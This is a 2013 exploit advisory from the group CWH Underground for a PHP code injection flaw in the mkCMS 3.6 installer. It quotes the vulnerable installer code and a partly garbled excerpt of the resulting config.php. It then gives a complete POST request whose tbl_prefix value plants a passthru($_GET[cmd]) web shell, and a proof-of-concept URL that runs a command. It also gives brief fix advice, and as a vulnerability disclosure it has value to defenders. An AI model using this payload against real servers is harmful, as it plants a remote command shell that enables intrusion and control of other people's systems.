# Exploit Title : mkCMS PHP Code Injection
# Date : 11 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://mkcms.milankragujevic.com/
# Software Link : http://jaist.dl.sourceforge.net/project/milan-cms/Releases/mkCMS-v3.6.zip
# Version : 3.6
# Tested on : Windows and Linux

,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/admin/install/verify_3.php (LINE: 5-81)

The installer reads the database settings from the session (apparently populated by the form posted to verify_2.php, shown under EXPLOIT below) and writes them into /config.php as PHP source without escaping or validating them, so a tbl_prefix value containing a closing single quote ends the string literal and whatever follows it is written into config.php as PHP code that runs whenever that file is included. The fix is to validate each value against a strict allow-list before writing it (a table prefix only needs [A-Za-z0-9_]), to emit it with var_export() or equivalent escaping rather than raw interpolation, and to remove or disable the installer once setup is complete.

-----------------------------------------------------------------------------
LINE 5-9:

$db_name = @$_SESSION['db_name'];
$db_user = @$_SESSION['db_user'];
$db_pass = @$_SESSION['db_pass'];
$db_host = @$_SESSION['db_host'];
$tbl_prefix = @$_SESSION['tbl_prefix'];
-----------------------------------------------------------------------------

-----------------------------------------------------------------------------
LINE 34-63:

$config = "passthru($_GET[cmd]),// /config.php
-----------------------------------------------------------------------------

'root',
'pass' => 'usbw',
'db' => 'mkcms',
'host' => 'localhost',
'prefix' => '' , "c" =>passthru($_GET[cmd]),//'
);
$root = '/mkCMS/';
$path = 'http://localhost/mkCMS/';
$sitename = get_set('sitename');
$sitedesc = get_set('sitedesc');
$language = get_set('lang');
$theme = get_set('theme');
$THEME_DIR = THEMES_DIR . $theme . '/';
$theme_path = $path . 
'themes/'.$theme.'/'; ?>
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

POST /mkCMS/admin/install/verify_2.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/mkCMS/admin/install/step2.php
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on; has_js=1; SESS3e2018b2c38b123a9f41b7251051544c=8RPdDYThmQJ1_psqG3gxv7o2ExJKKJVpS59B0vN2klg
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 145

db_name=mkcms&db_user=root&db_pass=toor&db_host=localhost&tbl_prefix=%27+%2C+%22c%22+%3D%3Epassthru%28%24_GET%5Bcmd%5D%29%2C%2F%2F&submit=Proceed

POC: http://target/mkCMS/index.php?cmd=dir

################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################